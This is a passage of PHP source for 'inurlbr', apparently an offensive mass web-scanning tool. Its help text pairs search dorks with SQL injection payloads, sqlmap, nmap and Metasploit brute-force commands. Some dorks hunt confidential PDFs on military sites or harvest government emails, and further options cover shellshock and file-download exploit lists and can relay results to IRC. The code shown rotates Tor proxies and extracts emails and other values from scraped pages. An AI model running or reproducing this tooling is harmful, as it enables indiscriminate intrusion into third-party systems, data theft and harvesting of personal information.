{$_SESSION["c1"]}[*]{$_SESSION["c0"]}Facebook: https://fb.com/InurlBrasil
{$_SESSION["c1"]}[*]{$_SESSION["c0"]}GIT: https://github.com/googleinurl
{$_SESSION["c1"]}[*]{$_SESSION["c0"]}Pastebin https://pastebin.com/u/Googleinurl
{$_SESSION["c1"]}[*]{$_SESSION["c0"]}PSS: https://packetstormsecurity.com/user/googleinurl
{$_SESSION["c1"]}[*]{$_SESSION["c0"]}YOUTUBE: http://youtube.com/c/INURLBrasil
{$_SESSION["c1"]}[*]{$_SESSION["c0"]}PLUS: http://google.com/+INURLBrasil
{$_SESSION["c1"]}[*]{$_SESSION["c0"]}Version: 2.1
{$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
{$_SESSION["c1"]}[+]{$_SESSION["c16"]}NECESSARY FOR THE PROPER FUNCTIONING OF THE SCRIPT{$_SESSION["c0"]}
{$_SESSION["c1"]}[ - ]{$_SESSION["c16"]} LIB & CONFIG{$_SESSION["c0"]}
* PHP Version 5.4.7
* php5-curl LIB
* php5-cli LIB
* cURL support enabled
* cURL Information 7.24.0
* allow_url_fopen On
* permission Reading & Writing
* User root privilege, or is in the sudoers group
* Operating system LINUX
* Proxy random TOR
{$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
{$_SESSION["c1"]}[+]{$_SESSION["c0"]} {$_SESSION["c16"]}PERMISSION EXECUTION: chmod +x inurlbr.php{$_SESSION["c0"]}
{$_SESSION["c1"]}[+]{$_SESSION["c0"]} {$_SESSION["c16"]}INSTALLING LIB PHP-CURL: sudo apt-get install php5-curl{$_SESSION["c0"]}
{$_SESSION["c1"]}[+]{$_SESSION["c0"]} {$_SESSION["c16"]}INSTALLING LIB PHP-CLI: sudo apt-get install php5-cli{$_SESSION["c0"]}
{$_SESSION["c1"]}[+]{$_SESSION["c0"]} {$_SESSION["c16"]}sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl033[0m
{$_SESSION["c1"]}[+]{$_SESSION["c0"]} {$_SESSION["c16"]}INSTALLING PROXY TOR https://www.torproject.org/docs/debian.html.en{$_SESSION["c0"]}
{$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
{$_SESSION["c1"]}[ - ]{$_SESSION["c16"]} COMMANDS SIMPLE SCRIPT{$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'inurl:php?id=' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q 1,6 {$_SESSION["c1"]}-t {$_SESSION["c2"]}1 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?´'%270x27;\" {$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'inurl:aspx?id=' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q 1,6 {$_SESSION["c1"]}-t {$_SESSION["c2"]}1 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?´'%270x27;\" {$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:br inurl:aspx (id|new)' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,6 {$_SESSION["c1"]}-t {$_SESSION["c2"]}1 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?´'%270x27;\"{$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'index of wp-content/uploads' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,6,2,4 {$_SESSION["c1"]}-t {$_SESSION["c2"]}2 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}'?' {$_SESSION["c1"]}-a {$_SESSION["c2"]}'Index of /wp-content/uploads'{$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.mil.br intext:(confidencial) ext:pdf' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q 1,6 -t 2 --exploit-get {$_SESSION["c3"]}'?' {$_SESSION["c1"]}-a {$_SESSION["c2"]}'confidencial'{$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.mil.br intext:(secreto) ext:pdf' {$_SESSION["c1"]}-s save.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,6 {$_SESSION["c1"]}-t {$_SESSION["c2"]}2 {$_SESSION["c1"]}--exploit-get {$_SESSION["c2"]}'?' {$_SESSION["c1"]}-a {$_SESSION["c2"]}'secreto'{$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:br inurl:aspx (id|new)' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,6 {$_SESSION["c1"]}-t {$_SESSION["c2"]}1 {$_SESSION["c1"]}--exploit-get {$_SESSION["c2"]}\"?´'%270x27;\"{$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'.new.php?new id' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q 1,6,7,2,3 {$_SESSION["c1"]}-t {$_SESSION["c2"]}1 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}'+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' {$_SESSION["c1"]}-a {$_SESSION["c2"]}'::EXPLOIT-SUCESS::'{$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'new.php?id=' {$_SESSION["c1"]}-s {$_SESSION["c2"]}teste.txt {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}?´0x27 {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'nmap sV -p 22,80,21 {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]}'{$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:pt inurl:aspx (id|q)' {$_SESSION["c1"]}-s {$_SESSION["c2"]}bruteforce.txt {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}?´0x27 {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'msfcli auxiliary/scanner/mssql/mssql_login RHOST={$_SESSION["c9"]}_TARGETIP_ {$_SESSION["c2"]}MSSQL_USER=inurlbr MSSQL_PASS_FILE=/home/pedr0/Documentos/passwords E'{$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:br inurl:id & inurl:php' {$_SESSION["c1"]}-s {$_SESSION["c2"]}get.txt {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?´'%270x27;\" {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'python ../sqlmap/sqlmap.py -u \"{$_SESSION["c14"]}_TARGETFULL_{$_SESSION["c2"]}\" --dbs'{$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'inurl:index.php?id=' {$_SESSION["c1"]}-q 1,2,10 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"'?´0x27'\" {$_SESSION["c1"]}-s {$_SESSION["c2"]}report.txt {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'nmap -Pn -p 1-8080 --script http-enum --open {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]}'{$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.gov.br email' {$_SESSION["c1"]}-s {$_SESSION["c2"]}reg.txt -q 1 --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'{$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}emails.txt {$_SESSION["c1"]}-m{$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}urls.txt {$_SESSION["c1"]}-u{$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:gov.bo' {$_SESSION["c1"]}-s {$_SESSION["c2"]}govs.txt {$_SESSION["c1"]}--exploit-all-id {$_SESSION["c2"]} 1,2,6 {$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.uk' {$_SESSION["c1"]}-s {$_SESSION["c2"]}uk.txt {$_SESSION["c1"]}--user-agent {$_SESSION["c2"]} 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)' {$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}'dorksSqli.txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}govs.txt {$_SESSION["c1"]}--exploit-all-id {$_SESSION["c2"]} 1,2,6 {$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}'dorksSqli.txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}sqli.txt {$_SESSION["c1"]}--exploit-all-id {$_SESSION["c2"]} 1,2,6 {$_SESSION["c1"]}--irc {$_SESSION["c2"]}'irc.rizon.net#inurlbrasil' {$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'inurl:\"cgi-bin/login.cgi\"' {$_SESSION["c1"]}-s {$_SESSION["c2"]}cgi.txt --ifurl 'cgi' --command-all 'php xplCGI.php _TARGET_' {$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--target {$_SESSION["c2"]}'http://target.com.br' {$_SESSION["c1"]}-o {$_SESSION["c2"]}cancat_file_urls_find.txt {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-t {$_SESSION["c2"]}4{$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--target {$_SESSION["c2"]}'http://target.com.br' {$_SESSION["c1"]}-o {$_SESSION["c2"]}cancat_file_urls_find.txt {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-t {$_SESSION["c2"]}4{$_SESSION["c0"]} {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?´'%270x27;\"{$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--target {$_SESSION["c2"]}'http://target.com.br' {$_SESSION["c1"]}-o {$_SESSION["c2"]}cancat_file_urls_find.txt {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-t {$_SESSION["c2"]}4{$_SESSION["c0"]} {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?pass=1234\" {$_SESSION["c1"]}-a {$_SESSION["c2"]}'hello! admin'{$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--target {$_SESSION["c2"]}'http://target.com.br' {$_SESSION["c1"]}-o {$_SESSION["c2"]}cancat_file_urls_find_valid_cod-200.txt {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-t {$_SESSION["c2"]}5{$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--range {$_SESSION["c2"]}'200.20.10.1,200.20.10.255' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'php roteador.php _TARGETIP_' {$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--range-rad {$_SESSION["c2"]}'1500' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'php roteador.php _TARGETIP_' {$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--dork-rad {$_SESSION["c2"]}'20' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}--exploit-get {$_SESSION["c2"]}\"?´'%270x27;\" {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,2,6,4,5,9,7,8 {$_SESSION["c0"]}
./inurlbr.php {$_SESSION["c1"]}--dork-rad {$_SESSION["c2"]}'20' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}--exploit-get {$_SESSION["c2"]}\"?´'%270x27;\" {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,2,6,4,5,9,7,8 {$_SESSION["c0"]} --pr
./inurlbr.php {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}'dorksCGI.txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,2,6,4,5,9,7,8 {$_SESSION["c0"]} --pr --shellshock
./inurlbr.php {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}'dorks_Wordpress_revslider.txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,2,6,4,5,9,7,8 {$_SESSION["c1"]}--sub-file {$_SESSION["c2"]}'xpls_Arbitrary_File_Download.txt' {$_SESSION["c0"]}
{$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}It it also useful to know the full path to the PHP binary on your computer. {$_SESSION["c0"]}
{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}There are several ways of finding out. For Ubuntu and Mac OS X the path is '/usr/bin/php'.{$_SESSION["c0"]}
googleinurl@inurlbr:~$ which php
/usr/bin/php
googleinurl@inurlbr:~/cli$ whereis php
php: /usr/bin/php /usr/share/php /usr/share/man/man1/php.1.gz
googleinurl@inurlbr:~/cli$ type -a php
php is /usr/bin/php
{$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
");
}
################################################################################
#BANNER HOME####################################################################
function __bannerLogo() {
$vis = ($_SESSION["os"] != 1) ? ("\033[1;3" . rand(1, 10) . "m") : NULL;
return (!is_null($_SESSION['config']['no-banner']) ? NULL : system("command clear") . "
{$vis} _____ {$_SESSION["c1"]} .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. {$_SESSION["c12"]}.1BR'''Yp, .8BR'''Cq.
{$vis} (_____){$_SESSION["c1"]} 01 01N. C 01 C 01 .01. 01 {$_SESSION["c3"]} 01 Yb 01 .01.
{$vis} (() ()){$_SESSION["c1"]} 01 C YCb C 01 C 01 ,C9 01 {$_SESSION["c12"]} 01 dP 01 ,C9
{$vis} \ / {$_SESSION["c1"]} 01 C .CN. C 01 C 0101dC9 01 {$_SESSION["c3"]} 01'''bg. 0101dC9
{$vis} \ / {$_SESSION["c1"]} 01 C .01.C 01 C 01 YC. 01 , {$_SESSION["c12"]} 01 .Y 01 YC.
{$vis} /=\ {$_SESSION["c1"]} 01 C Y01 YC. ,C 01 .Cb. 01 ,C {$_SESSION["c3"]} 01 ,9 01 .Cb.
{$vis} [___] {$_SESSION["c1"]} .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C {$_SESSION["c12"]}.J0101Cd9 .J01L. .J01./ {$_SESSION["c1"]}2.1\n
{$_SESSION["c1"]}__[ ! ] Neither war between hackers, nor peace for the system.
{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}http://blog.inurl.com.br
{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}http://fb.com/InurlBrasil
{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}http://twitter.com/@googleinurl{$_SESSION["c0"]}
{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}http://github.com/googleinurl{$_SESSION["c0"]}
{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}Current PHP version::[ {$_SESSION["c1"]}" . phpversion() . " {$_SESSION["c16"]}]{$_SESSION["c0"]}
{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}Current script owner::[ {$_SESSION["c1"]}" . get_current_user() . " {$_SESSION["c16"]}]{$_SESSION["c0"]}
{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}Current uname::[ {$_SESSION["c1"]}" . php_uname() . " {$_SESSION["c16"]}]{$_SESSION["c0"]}
{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}Current pwd::[ {$_SESSION["c1"]}" . getcwd() . " {$_SESSION["c16"]}]{$_SESSION["c0"]}
{$_SESSION["c1"]}__[ ! ] {$_SESSION["c2"]}Help: php inurlbr.php --help{$_SESSION["c0"]}
{$_SESSION["c1"]}------------------------------------------------------------------------------------------------------------------------{$_SESSION["c0"]}
");
}
################################################################################
#CHANGE PROXY FUNCTION IN TIME##################################################
################################################################################
function __timeValueChangeProxy($sec = NULL) {
return not_isnull_empty($sec) ? date('Y-m-d H:i:s', strtotime(date('Y-m-d H:i:s') . " + {$sec} second")) : NULL;
}
function __timeSecChangeProxy($list_proxy) {
if ($_SESSION["config"]["time_change_proxy"] < date('Y-m-d H:i:s') && !is_null($list_proxy)) {
$proxy = $list_proxy[rand(0, count($list_proxy) - 1)];
echo ("[ INFO ][PROXY] CHANGE: {$proxy} - " . date('Y-m-d H:i:s') . "\n");
$_SESSION["config"]["proxy"] = $proxy;
$_SESSION["config"]["time_change_proxy"] = __timeValueChangeProxy($_SESSION["config"]["time-proxy"]);
__plus();
}
}
################################################################################
#GET STATUS HTTP URL############################################################
################################################################################
function __getStatusURL($url) {
if (!is_null($url) && !empty($url)) {
return FALSE;
}
__plus();
$status = array();
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_URL, $url);
$resultadoCurl = curl_exec($curl);
if ($resultadoCurl) {
preg_match_all('(HTTP.*)', $resultadoCurl, $status['http']) . __plus();
return (!is_null($status['http']) && !empty($status['http'])) ? TRUE : FALSE;
}
unset($curl);
return FALSE;
}
################################################################################
#BEEP ##########################################################################
################################################################################
function __cli_beep() {
echo ($_SESSION['config']['beep']) ? "\x07" : NULL;
}
################################################################################
#SETUP TO RUN COMMANDS IN ID####################################################
################################################################################
function __configExploitsExec($id, $alvo) {
$resultadoURL = __configExploitsList();
$final = array();
$id_ = ((strstr($id, ','))) ? explode(',', $id) : array($id); // MULTIPLAS ID'S EXPLOITS
foreach ($resultadoURL as $key) {
$__key = strstr($key, '::') ? explode("\n", $key) : NULL;
$final = is_array($__key) ? array_merge($final, $__key) : $final;
}
foreach ($id_ as $value) {
$final__ = isset($value) && !empty($value) ? explode('::', $final[$value]) : NULL;
$barra = "{$_SESSION["c1"]}[ INFO ]|___{$_SESSION["c0"]}\n";
$barra.= " {$_SESSION["c1"]}|";
print !is_null($final__) ? "\n{$barra}[ EXPLOIT ]:: {$final__[0]} /[ ID ]:: {$value} /[ COMMAND ]:: " . $final__[1] : NULL;
echo "\n ------------------------------------------------------------------------------------------------------------------";
print !is_null($final__) ? __command($final__[1], $alvo) : NULL;
__plus();
}
}
################################################################################
#LIST COMMANDS FILE exploits.conf###############################################
################################################################################
function __configExploitsList($op = NULL) {
$resultadoURL = array_unique(array_filter(explode("\n", file_get_contents($_SESSION['config']['file_exploit_conf']))));
if (!is_null($op)) {
echo __bannerlogo();
echo $_SESSION["c11"];
echo "[*]__\n";
echo " |MENU EXPLOITS:";
echo "\n |ID TYPE_EXPLOIT::EXPLOIT_COMMAND";
echo "\n |FILE CONFIG: {$_SESSION['config']['file_exploit_conf']}";
echo "\n |USE COMMAND EX: --exploit-id '1,2,3,19'";
echo "\n-----------------------------------------------------------------------------------------------------------------------\n";
print_r($resultadoURL);
__getOut("{$_SESSION['config']['line']}\n");
} else {
return is_array($resultadoURL) ? $resultadoURL : NULL;
}
}
################################################################################
#INSERT VALUES COMMANDS FILE exploits.conf######################################
################################################################################
function __configExploitsADD($valor = NULL) {
if (!is_null($valor) && preg_match("(([a-zA-Z0-9-].*)(::.*)([a-zA-Z0-9-]))", $valor)) {
echo __bannerlogo();
echo $_SESSION["c11"];
echo "[*]__\n";
echo " |MENU EXPLOITS:";
echo "\n |ID TYPE_EXPLOIT::EXPLOIT_COMMAND";
echo "\n |STATUS: ADDED VALUE WITH SUCCESS!";
echo "\n |VALUE: {$valor}";
echo "\n-----------------------------------------------------------------------------------------------------------------------\n";
__saveValue($_SESSION['config']['file_exploit_conf'], __crypt($valor), 2);
print_r(__configExploitsList());
__getOut("{$_SESSION['config']['line']}\n");
} else {
__getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]}INCORRECT FORMAT! / Format TYPE_EXPLOIT::EXPLOIT_COMMAND / ex: NMAP::nmap -sV _TARGET_\n");
}
}
################################################################################
#CHECK CMS######################################################################
################################################################################
function __SimpleCheckCMS($html) {
$cms['XOOPS CMS IDENTIFIED'] = ' $valor) {
__plus();
if (strstr($html, $cms[$campo])) {
return(" {$campo} ");
}
}
return "0xUNIDENTIFIED";
}
################################################################################
#REPLACE THE SECURITIES URL#####################################################
################################################################################
function __replace($exploit, $url) {
$exploit_ = strstr($_SESSION['config']['replace'], '[INURL]') ?
$exploit :
__getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}DEFINE THE CORRECT REPLACE COMMAND ex: --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user+from+mysql.user+limit+0,1)=1'{$_SESSION["c0"]}\n");
$exploit = explode("[INURL]", $exploit_);
$exploit[0] = (isset($exploit[0]) && !is_null($exploit[0])) ?
$exploit[0] :
__getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}DEFINE THE CORRECT REPLACE COMMAND ex: --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user+from+mysql.user+limit+0,1)=1'{$_SESSION["c0"]}\n");
$exploit[1] = (isset($exploit[0]) && !is_null($exploit[1])) ?
$exploit[1] :
__getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}DEFINE THE CORRECT REPLACE COMMAND ex: --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user+from+mysql.user+limit+0,1)=1'{$_SESSION["c0"]}\n");
return str_replace($exploit[0], $exploit[1], $url);
}
################################################################################
#REMOVE VALUE URL###############################################################
################################################################################
function __remove($value, $url) {
return str_replace($value, NULL, $url);
}
################################################################################
#VALID MENU OPTIONS#############################################################
################################################################################
function __validateOptions($opArray, $validar, $op = NULL) {
if (empty($validar) || empty($opArray)) {
return FALSE;
}
$array = explode(',', $opArray);
if (is_null($op)) {
$busca = explode(',', $validar);
for ($i = 0; $i <= count($busca); $i++) {
if (in_array($busca[$i], $array)) {
return TRUE;
}
}
} else {
for ($i = 0; $i <= count($array); $i++) {
if (strstr($validar, $array[$i])) {
return TRUE;
}
}
}
return FALSE;
}
################################################################################
#VALIDATE OPERATING SYSTEM AND COLOR SYSTEM#####################################
################################################################################
function __OS() {
$sistema = strtoupper(PHP_OS);
if (substr($sistema, 0, 3) == "WIN") {
$i = 0;
system("cls");
$_SESSION["os"] = 1;
while ($i <= 17) {
$_SESSION["c{$i}"] = NULL;
$i++;
}
} else {
system("command clear");
//DEFINING COLORS
$_SESSION["c0"] = "\033[0m"; // END OF COLOR
$_SESSION["c1"] = "\033[1;37m"; // WHITE
$_SESSION["c2"] = "\033[1;33m"; // YELLOW
$_SESSION["c3"] = "\033[1;31m"; // RED LIGHT
$_SESSION["c4"] = "\033[32m"; // GREEN
$_SESSION["c5"] = "\033[1;32m"; // GREEN LIGHT
$_SESSION["c6"] = "\033[0;35m"; // PURPLE
$_SESSION["c7"] = "\033[1;30m"; // DARK GREY
$_SESSION["c8"] = "\033[0;34m"; // BLUE
$_SESSION["c9"] = "\033[0;37m"; // LIGHT GREY
$_SESSION["c10"] = "\033[0;33m"; // BROWN
$_SESSION["c11"] = "\033[1;35m"; // LIGHT PURPLE
$_SESSION["c12"] = "\033[0;31m"; // RED
$_SESSION["c13"] = "\033[1;36m"; // LIGHT CYAN
$_SESSION["c14"] = "\033[0;36m"; // CIANO
$_SESSION["c15"] = "\033[1;34m"; // LIGHT BLUE
$_SESSION["c16"] = "\033[02;31m"; // DARK RED
}
}
################################################################################
#SAVE URL VULNERABLE COMMAND ECHO >> FILE######################################
################################################################################
function __saveValue($arquivo, $valor, $op = NULL) {
$path = !not_isnull_empty($_SESSION['config']['save-as']) ? $_SESSION['config']['out_put_paste'] : NULL;
echo ($op == 1) ?
"\n{$_SESSION["c1"]}|_[ + ]{$_SESSION["c7"]} VALUE SAVED IN THE FILE::{$_SESSION["c9"]} {$arquivo}{$_SESSION["c0"]}" : NULL;
file_put_contents(($op == 2) ? $arquivo : $path . $arquivo, "{$valor}\n", FILE_APPEND);
}
################################################################################
#CAPTURE ID KEY TO SEARCH LYCOS MAKE############################################
################################################################################
function __getIdSearchLycos($html) {
$match = NULL;
preg_match_all("(val.*)", $html, $match);
return (str_replace(');', '', str_replace('val(', '', str_replace("'", '', $match[0][4]))));
}
################################################################################
#RENEW IP NETWORK TOR###########################################################
################################################################################
function __renewTOR() {
system("[ -z 'pidof tor' ] || pidof tor | xargs sudo kill -HUP;");
$request__ = __request_info('http://dynupdate.no-ip.com/ip.php', $_SESSION["config"]["proxy"]);
__plus();
echo "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ IP NETWORK TOR RENEWED ]::: {$_SESSION["c1"]}[ {$request__['corpo'] } ]\n{$_SESSION["c0"]}";
/* https://pt.wikipedia.org/wiki/Pidof
* pidof é um utilitário Linux que encontra o ID de um programa em execução.
* Note que o próprio nome é a junção dos termos pid, que significa identidade
* de um processo e of que significa de. Portanto pidof quer dizer identidade
* de processo de...
* O equivalente no Solaris é pgrep. pidof firefox-bin O commando acima retorna
* o pid do processo que está executando firefox-bin.
* Pode-se combinar o commando 'pidof' com o commando kill dessa forma:
* kill -9 $(pidof firefox-bin) pidof é simplesmente uma ligação simbólica
* para o programa killall5,que está localizado em /sbin.
*/
}
################################################################################
#This function will validate emails#############################################
################################################################################
function __validateEmail($email) {
$conta = "^[a-zA-Z0-9\._-]+@";
$domino = "[a-zA-Z0-9\._-]+.";
$extensao = "([a-zA-Z]{2,4})$";
$pattern = $conta . $domino . $extensao;
return (ereg($pattern, $email)) ? TRUE : FALSE;
}
################################################################################
#This function will validate URLS###############################################
################################################################################
function __validateURL($url) {
if (preg_match("#\b(http[s]?://|ftp[s]?://){1,}?([-a-zA-Z0-9\.]+)([-a-zA-Z0-9\.]){1,}([-a-zA-Z0-9_\.\#\@\:%_/\?\=\~\-\//\!\'\(\)\s\^\:blank:\:punct:\:xdigit:\:space:\$]+)#si", $url)) {
return TRUE;
} else {
return FALSE;
}
}
################################################################################
#This function will filter custom values########################################
################################################################################
function __extractRegCustom($html, $url_) {
$matches = NULL;
__plus();
preg_match_all("#\b{$_SESSION['config']['regexp-filter']}#i", $html, $matches);
echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}\n";
echo "{$_SESSION["c1"]} |_[ URL ] {$_SESSION["c0"]}=>{$_SESSION["c9"]} {$url_} {$_SESSION["c0"]}\n";
$matches_ = array_filter(array_unique(array_unique($matches[0])));
foreach ($matches_ as $valor) {
if (not_isnull_empty($valor)) {
echo "{$_SESSION["c1"]}__[ + ] {$_SESSION["c0"]}[\033[01;31m {$_SESSION['config']['cont_valores']} {$_SESSION["c0"]}]- {$valor}\n";
$_SESSION["config"]["resultado_valores"].="{$valor}\n";
__plus();
__saveValue($_SESSION["config"]["arquivo_output"], $valor);
$_SESSION['config']['cont_valores'] ++;
}
__plus();
}
__timeSec('delay', "\n");
}
################################################################################
#This function will filter and mail each url####################################
################################################################################
function __filterEmailif($resultados) {
if (is_array($resultados)) {
echo "{$_SESSION["c1"]}|_[ ! ][ INFO ]{$_SESSION["c16"]}[ FILTERING VALUE ]::{$_SESSION["c1"]}[ {$_SESSION["config"]['ifemail']} ]{$_SESSION["c0"]}\n";
foreach ($resultados as $value) {
$temp[] = (strstr($value, $_SESSION['config']['ifemail']) ? $value : NULL);
}
return array_unique(array_filter($temp));
}
RETURN FALSE;
}
################################################################################
#This function extract emails###################################################
################################################################################
function __extractEmail($html, $url_) {
$matches = NULL;
__plus();
preg_match_all('/([\w\d\.\-\_]+)@([\w\d\.\_\-]+)/mi', $html, $matches);
echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}\n";
echo "{$_SESSION["c1"]}|_[ ! ][ INFO ][URL] :: {$_SESSION["c9"]} {$url_} {$_SESSION["c0"]}\n";
$_matches = array_filter(array_unique(array_unique($matches[0])));
$matches_ = (not_isnull_empty($_SESSION['config']['ifemail']) ? __filterEmailif($_matches) : $_matches);
foreach ($matches_ as $valor) {
if (__validateEmail($valor)) {
echo "{$_SESSION["c1"]}|_[ + ]{$_SESSION["c0"]}[\033[01;31m {$_SESSION['config']['cont_valores']} {$_SESSION["c0"]}]- {$valor} "
. (filter_var($valor, FILTER_VALIDATE_EMAIL) ?
"{$_SESSION["c14"]}[ OK ]{$_SESSION["c0"]}" : "{$_SESSION["c16"]}[ NO ]{$_SESSION["c0"]}") . "\n";
